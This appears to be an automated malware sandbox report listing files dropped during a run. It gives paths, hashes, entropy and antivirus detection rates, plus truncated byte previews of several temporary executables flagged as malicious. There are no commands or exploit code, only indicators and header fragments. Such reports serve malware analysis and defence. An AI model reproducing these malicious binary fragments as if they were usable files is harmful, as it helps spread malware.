Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E93.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.696246008462747
Encrypted:	false
SSDEEP:	96:9GiZYWBubhddalYiYADWroHKUYEZzkstrigkOLzwRyC97aNk9At8I4/3:9jZDXlFvkz/97aNk9At74/3
MD5:	2F634B54C8BD66B1F1A55B4EC51F7840
SHA1:	32D8023A10E64A0DD194D6F504466B5F6BCB9ACE
SHA-256:	3E34045BF40114946DF5EE6435F4DDFDE287F8ADB05E84011CC41372BA48C0D1
SHA-512:	5F8D6CF992088D0F53D2458FC8357623F6D902BB983AA5A603EF3CC44D4BFB3CCEB4933CB618D5D44806BB75C5F477A4397FECDFDA786C91C39F8179FBF44DB1
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6E2.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	51100
Entropy (8bit):	3.065536061021575
Encrypted:	false
SSDEEP:	768:sAH+OF+Et0rWE/230frj2FZOTo/sBw9fm5vjcbgX8:sAHRB0l230Tj2FZMo/sBw9fm5vjcbgX8
MD5:	9A6560221109CF6DC6D1181532311280
SHA1:	7C675FD2498E5A94B827C3500776ADDF85AC3B29
SHA-256:	33B139EE36667DE6A30D7A03DA377B6165A71107CC625C963C1D53220292E892
SHA-512:	44D00625A305F47AECA9B14F09B3FF63F3DA5FA61A71872B99A0C65689F2E40F901E9A956E28176DE3C984AC82135E129899B51AFF0B066DB25377E3DD7DECA8
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERADC7.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	53558
Entropy (8bit):	3.0577445365050546
Encrypted:	false
SSDEEP:	1536:FqHffSe2EPOVE2qZGCVqQbLbu1xkbOBn9LvT+XtigB:FqHffSe2EPOVE2qZGCVqQbPu1xkbOBn4
MD5:	44F909722F6881ACB5E0D38DC5049285
SHA1:	5706A9B1E113AD28B7F0A03C23225FE40EB5BF25
SHA-256:	6B768330BA798FE5485A054DE417DAB859FD699FAB81D8FF1436BA6D9BAE829A
SHA-512:	F160455B750A640B658B45FDDD572919A5CE60764AFAC07C3CD71D6D888915F16C6C1F43EE17F0935661B4957DA9C352F2D00EEC31D40C17F62E1564FF460884
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAEE2.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.69513043446906
Encrypted:	false
SSDEEP:	96:9GiZYWxvo/arYLYFBWDazHNUYEZgztFipFKFowbGAnsaS0BM4aIt33:9jZDJMIkaf52aS0BM4Nt33
MD5:	50D28775D5999ACE46C22C7DCCBA883D
SHA1:	7528888E8F506DE3C8896E00F06DF8C97B688CA8
SHA-256:	836333D49E9F1E2F3295F85CC601AB6246D9744FDA09B9970543C61BBE6FE340
SHA-512:	75277E3CF2C41086D1DE67026708AD8BC6F87031F300215B9E5834C9B60833AA82F89C80D0131B4F5173ECCD9FF49D251213891332BC2AF08A914BEDCEC1EE4C
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB673.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.696427295032779
Encrypted:	false
SSDEEP:	96:9GiZYWdKw9aHYtYItW8HGUYEZuGtriKjkJLCw9JPmkaBoxP6rZaEWIGZ2a3:9jZDIHqHk1JukauJ6rZaERGZ2a3
MD5:	4AB02C3931E0B05AB492267DDEDB81FC
SHA1:	028F4AD9FBCF725953A84B21F89C3C55F3A43DA0
SHA-256:	948238F9A7DAFD6B69DA99D0430F09F44D9E9B30C0C853BE18E8345A10D7676D
SHA-512:	0E9DC0351D7531B3C557A0C6C69E9E54A8F32EE5A7C3CA1DA642BB412AE443CB43B1E4C8C37D534E2BEEE1B9C2820B16568034A3167CF32786E0A32DF9173A9C
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2493
Entropy (8bit):	5.229161033546255
Encrypted:	false
SSDEEP:	24:2dS48pX4y/DvKWDkQpydX8ICDKbnTiTBMuT52YGP8EqXpWfKFghR4p/BzceFYMQc:cAn/TLtpuQ6Zhip/B4VDSkC9+TiL+s
MD5:	745BFA39C73F634F5383C83A69A11AD0
SHA1:	D946292D52770ADBBEAC4A4D4E5A18407D1A80D9
SHA-256:	E2B998E9EC2D0C2FE171C06C98A6BE56D0CB1C00D8D0D007B526F782EBDAF763
SHA-512:	B775FD26BAD7E17250738E7CE7489CC34207B295D54EE21079D62C7485A8315A5DF7CDA7607B4001B5133EE7A297ACDDCE059127D9876420A648A66E1205B7D0
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399985333469120</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399985333781637</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399985333469120</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">132459503442223904</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu

C:\ProgramData\USOPrivate\UpdateStore\updatestoretemp51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2493
Entropy (8bit):	5.229161033546255
Encrypted:	false
SSDEEP:	24:2dS48pX4y/DvKWDkQpydX8ICDKbnTiTBMuT52YGP8EqXpWfKFghR4p/BzceFYMQc:cAn/TLtpuQ6Zhip/B4VDSkC9+TiL+s
MD5:	745BFA39C73F634F5383C83A69A11AD0
SHA1:	D946292D52770ADBBEAC4A4D4E5A18407D1A80D9
SHA-256:	E2B998E9EC2D0C2FE171C06C98A6BE56D0CB1C00D8D0D007B526F782EBDAF763
SHA-512:	B775FD26BAD7E17250738E7CE7489CC34207B295D54EE21079D62C7485A8315A5DF7CDA7607B4001B5133EE7A297ACDDCE059127D9876420A648A66E1205B7D0
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399985333469120</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399985333781637</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399985333469120</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">132459503442223904</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu

C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.001.etl (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.7649970978747143
Encrypted:	false
SSDEEP:	192:xii8i/EV0E+Nn9MC++6U6yuI6LpYL87LWdCLWMa:wZR6oa
MD5:	16A89235CAAF9B886829EF4DA5C9B3B3
SHA1:	2E33823F067339232CE23D5C4DB6763B690DDCCA
SHA-256:	D502642BE4B16C9D616952661BBB7F754A1F8200F078AE67CD230541C4FB51AF
SHA-512:	A7140CEAAEBCC4B1D0B6310440495692DF21616D29B38FB0FC8F3452115F2CD82169063F27FB70A3A9038564E99AD4F4948193F9F8EB4950AC89CD4B4E56CB67
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................l.0+.....................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................~.C+..... .....l.0+............U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.........l.0+....................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration_Temp.1.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.7649970978747143
Encrypted:	false
SSDEEP:	192:xii8i/EV0E+Nn9MC++6U6yuI6LpYL87LWdCLWMa:wZR6oa
MD5:	16A89235CAAF9B886829EF4DA5C9B3B3
SHA1:	2E33823F067339232CE23D5C4DB6763B690DDCCA
SHA-256:	D502642BE4B16C9D616952661BBB7F754A1F8200F078AE67CD230541C4FB51AF
SHA-512:	A7140CEAAEBCC4B1D0B6310440495692DF21616D29B38FB0FC8F3452115F2CD82169063F27FB70A3A9038564E99AD4F4948193F9F8EB4950AC89CD4B4E56CB67
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................l.0+.....................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................~.C+..... .....l.0+............U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.........l.0+....................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\13E2.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\13E2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	700
Entropy (8bit):	5.346524082657112
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
MD5:	65CF801545098D915A06D8318D296A01
SHA1:	456149D5142C75C4CF74D4A11FF400F68315EBD0
SHA-256:	32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
SHA-512:	4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Temp\13E2.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	537088
Entropy (8bit):	5.840438491186833
Encrypted:	false
SSDEEP:	12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
MD5:	D7DF01D8158BFADDC8BA48390E52F355
SHA1:	7B885368AA9459CE6E88D70F48C2225352FAB6EF
SHA-256:	4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
SHA-512:	63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 46%, Browse Antivirus: ReversingLabs, Detection: 89%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y...............0.............I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ..................... ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(......0..,.......(d...8.....~....u....s....z&8.........8...................................(d...(.......j................................(.....~(....(^...8....(.........8........................................0..............0...................................(......0.....................0..............(....z.A.........z.A............................................*.......

C:\Users\user\AppData\Local\Temp\2819.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	301056
Entropy (8bit):	5.192330972647351
Encrypted:	false
SSDEEP:	3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
MD5:	277680BD3182EB0940BC356FF4712BEF
SHA1:	5995AE9D0247036CC6D3EA741E7504C913F1FB76
SHA-256:	F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
SHA-512:	0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 46%, Browse Antivirus: ReversingLabs, Detection: 77%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3D67.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	294400
Entropy (8bit):	5.161700003924834
Encrypted:	false
SSDEEP:	3072:jeZ5ZOixQx3X3QR6+lnj2D+bLiVsJEarkCVggjcGkNIVqI:jeZ74nAt1MEi1arR7ITsq
MD5:	BB0BA8D31F37E6B9F683EBD9044F1A85
SHA1:	4809E4E2D68DFBAB64E8D0C78DEBCCAB3AFEB219
SHA-256:	5C84D1C4DE9E3BCCD37EA7B64B4EC7551A1D50FA38F70217F0D9B1D79C496F9C
SHA-512:	25E240D39FF1508F9B294F202F81DA68D9F26848A85A698059E004022732AB3D744033D69BD3617C663D5C3FF2EC01D07A10A6E3D13C0EB84A6791F06AA000AA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,?a.Bla.Bla.Bl._.l\|.Bl._.l..Bl._.lO.BlF.9lb.Bla.Cl..Bl._.l`.Bl._.l`.Bl._.l`.BlRicha.Bl........................PE..L.....`................. ...........2.......0....@.............................................................................(.... ...............................1...............................r..@............0...............................text............ .................. ..`.rdata...X...0...Z...$..............@..@.data............"...~..............@....rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\45F8.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	905216
Entropy (8bit):	7.399713113456654
Encrypted:	false
SSDEEP:	12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
MD5:	852D86F5BC34BF4AF7FA89C60569DF13
SHA1:	C961CCD088A7D928613B6DF900814789694BE0AE
SHA-256:	2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
SHA-512:	B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P\|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5F8C.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	373760
Entropy (8bit):	6.990411328206368
Encrypted:	false
SSDEEP:	6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
MD5:	8B239554FE346656C8EEF9484CE8092F
SHA1:	D6A96BE7A61328D7C25D7585807213DD24E0694C
SHA-256:	F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
SHA-512:	CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
Malicious:	true
